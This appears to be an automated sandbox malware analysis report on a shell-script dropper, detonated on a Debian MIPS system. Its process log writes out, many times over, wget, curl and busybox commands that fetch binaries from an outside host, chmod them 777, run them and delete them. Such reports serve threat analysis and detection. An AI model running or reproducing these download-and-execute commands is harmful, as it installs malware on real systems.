Malware Analysis Report

2025-06-15 23:10

Sample ID 241018-cjjanazgqa
Target 840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh
SHA256 840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da

Threat Level: Shows suspicious behavior

The file 840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

System Network Configuration Discovery

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-18 02:06

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-18 02:06

Reported

2024-10-18 02:08

Platform

debian9-mipsel-20240729-en

Max time kernel

138s

Max time network

137s

Command Line

[/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N N/A
N/A /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 N/A
N/A /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU N/A
N/A /tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O /tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O N/A
N/A /tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ /tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ N/A
N/A /tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4 /tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4 N/A
N/A /tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP /tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP N/A
N/A /tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U /tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U N/A
N/A /tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx /tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx N/A
N/A /tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ /tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ N/A
N/A /tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP /tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP N/A
N/A /tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf /tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf N/A
N/A /tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU /tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU N/A
N/A /tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe /tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe N/A
N/A /tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx /tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx N/A
N/A /tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4 /tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4 N/A
N/A /tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP /tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP N/A
N/A /tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U /tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U N/A
N/A /tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe /tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe N/A
N/A /tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ /tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ N/A
N/A /tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP /tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP N/A
N/A /tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf /tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf N/A
N/A /tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU /tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU N/A
N/A /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU N/A
N/A /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N N/A
N/A /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 N/A
N/A /tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ /tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ N/A
N/A /tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O /tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ /usr/bin/curl N/A
File opened for modification /tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf /usr/bin/curl N/A
File opened for modification /tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ /usr/bin/curl N/A
File opened for modification /tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx /usr/bin/curl N/A
File opened for modification /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N /usr/bin/curl N/A
File opened for modification /tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O /usr/bin/curl N/A
File opened for modification /tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP /usr/bin/curl N/A
File opened for modification /tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ /usr/bin/curl N/A
File opened for modification /tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP /usr/bin/curl N/A
File opened for modification /tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx /usr/bin/curl N/A
File opened for modification /tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP /usr/bin/curl N/A
File opened for modification /tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U /usr/bin/curl N/A
File opened for modification /tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U /usr/bin/curl N/A
File opened for modification /tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe /usr/bin/curl N/A
File opened for modification /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 /usr/bin/curl N/A
File opened for modification /tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ /usr/bin/curl N/A
File opened for modification /tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O /usr/bin/curl N/A
File opened for modification /tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4 /usr/bin/curl N/A
File opened for modification /tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP /usr/bin/curl N/A
File opened for modification /tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe /usr/bin/curl N/A
File opened for modification /tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4 /usr/bin/curl N/A
File opened for modification /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU /usr/bin/curl N/A
File opened for modification /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N /usr/bin/curl N/A
File opened for modification /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU /usr/bin/curl N/A
File opened for modification /tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU /usr/bin/curl N/A
File opened for modification /tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU /usr/bin/curl N/A
File opened for modification /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 /usr/bin/curl N/A
File opened for modification /tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf /usr/bin/curl N/A

Processes

/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh

[/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]

/bin/chmod

[chmod 777 wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]

/tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N

[./wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]

/bin/rm

[rm wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]

/bin/chmod

[chmod 777 yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]

/tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3

[./yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]

/bin/rm

[rm yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]

/bin/chmod

[chmod 777 v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]

/tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU

[./v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]

/bin/rm

[rm v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]

/bin/chmod

[chmod 777 JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]

/tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O

[./JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]

/bin/rm

[rm JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ]

/bin/chmod

[chmod 777 ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ]

/tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ

[./ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ]

/bin/rm

[rm ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4]

/bin/chmod

[chmod 777 OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4]

/tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4

[./OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4]

/bin/rm

[rm OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP]

/bin/chmod

[chmod 777 dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP]

/tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP

[./dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP]

/bin/rm

[rm dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U]

/bin/chmod

[chmod 777 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U]

/tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U

[./4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U]

/bin/rm

[rm 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx]

/bin/chmod

[chmod 777 M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx]

/tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx

[./M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx]

/bin/rm

[rm M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ]

/bin/chmod

[chmod 777 UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ]

/tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ

[./UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ]

/bin/rm

[rm UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP]

/bin/chmod

[chmod 777 NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP]

/tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP

[./NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP]

/bin/rm

[rm NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf]

/bin/chmod

[chmod 777 oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf]

/tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf

[./oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf]

/bin/rm

[rm oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU]

/bin/chmod

[chmod 777 NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU]

/tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU

[./NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU]

/bin/rm

[rm NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe]

/bin/chmod

[chmod 777 uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe]

/tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe

[./uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe]

/bin/rm

[rm uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx]

/bin/chmod

[chmod 777 M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx]

/tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx

[./M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx]

/bin/rm

[rm M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4]

/bin/chmod

[chmod 777 OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4]

/tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4

[./OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4]

/bin/rm

[rm OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP]

/bin/chmod

[chmod 777 dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP]

/tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP

[./dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP]

/bin/rm

[rm dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U]

/bin/chmod

[chmod 777 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U]

/tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U

[./4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U]

/bin/rm

[rm 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe]

/bin/chmod

[chmod 777 uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe]

/tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe

[./uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe]

/bin/rm

[rm uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ]

/bin/chmod

[chmod 777 UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ]

/tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ

[./UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ]

/bin/rm

[rm UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ]

/usr/bin/wget

